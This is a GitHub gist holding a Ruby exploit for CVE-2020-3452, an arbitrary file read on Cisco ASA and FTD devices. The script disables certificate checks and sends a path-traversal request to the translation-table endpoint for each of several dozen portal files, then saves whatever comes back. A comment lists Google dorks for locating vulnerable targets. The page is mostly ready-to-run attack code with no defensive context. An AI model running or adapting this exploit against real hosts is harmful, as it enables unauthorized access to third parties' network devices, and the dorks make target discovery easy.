Skip to content

Instantly share code, notes, and snippets.

@komodoooo
Last active May 14, 2024 14:38
Show Gist options
  • Save komodoooo/ca6ac04f43f14d32f69823d9cfba50c2 to your computer and use it in GitHub Desktop.
Save komodoooo/ca6ac04f43f14d32f69823d9cfba50c2 to your computer and use it in GitHub Desktop.
CVE-2020-3452 exploit
require 'http'
require 'openssl'
puts """
CVE-2020-3452
CISCO ASA&FTD arbitrary file read exploit
By komodo\n
"""
=begin
Google dorks to search vulnerable target:
inurl:"/+CSCOE+/"
inurl:logon.html "CSCOE"
(some of these may not be vulnerable)
=end
$cont=1
$dirname="CISCO_files"
def dir(name=$dirname)
begin
Dir.mkdir(name)
Dir.chdir(name)
rescue Errno::EEXIST
$cont+=1
dir("#{$dirname}-#{$cont}")
end
end
def main(target)
files = ["logo.gif","http_auth.html","user_dialog.html","localization_inc.lua",
"portal_inc.lua","include","nostcaccess.html","ask.html","no_svc.html",
"svc.html","session.js","useralert.html","ping.html","help","app_index.html",
"tlbr","portal_forms.js","logon_forms.js","win.js","portal.css","portal.js",
"sess_update.html","blank.html","noportal.html","portal_ce.html","portal.html",
"home","logon_custom.css","portal_custom.css","preview.html","session_expired",
"custom","portal_elements.html","commonspawn.js","common.js","appstart.js",
"appstatus","relaymonjar.html","relaymonocx.html","relayjar.html",
"relayocx.html","portal_img","color_picker.js","color_picker.html",
"cedhelp.html","cedmain.html","cedlogon.html","cedportal.html",
"cedsave.html","cedf.html","ced.html","lced.html","files",
"041235123432C2","041235123432U2","pluginlib.js","shshim",
"do_url","clear_cache","connection_failed_form","apcf",
"ucte_forbidden_data","ucte_forbidden_url","cookie",
"session_password.html","tunnel_linux.jnlp","tunnel_mac.jnlp",
"sdesktop","gp-gip.html","auth.html","wrong_url.html","logon_redirect.html",
"logout.html","logon.html","test_chargen"]
target.delete_suffix!("/") unless target[-1..-1] != "/"
@ctx = OpenSSL::SSL::SSLContext.new()
@ctx.verify_mode = OpenSSL::SSL::VERIFY_NONE
dir()
File.open("!target.txt", "w"){|f|f.write(target)}
files.each do |file|
r = HTTP.get("#{target}/+CSCOT+/translation-table?type=mst&textdomain=%2bCSCOE%2b/#{file}&default-language&lang=../",
:ssl_context=>@ctx)
if r.to_s.include?("File not found")
puts "File '#{file}' not found"
elsif r.code == 200
output = File.open(file, "w")
output.write(r.body)
output.close()
puts "Downloaded file #{file}"
else
puts "Not vulnerable (status code #{r.code})"
exit()
end
end
puts "\nExploit finished, all downloaded files are stored in \n#{Dir.pwd}"
end
begin
print "\rTarget url: "
main(gets.chomp)
rescue => e
abort(e.to_s)
end
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment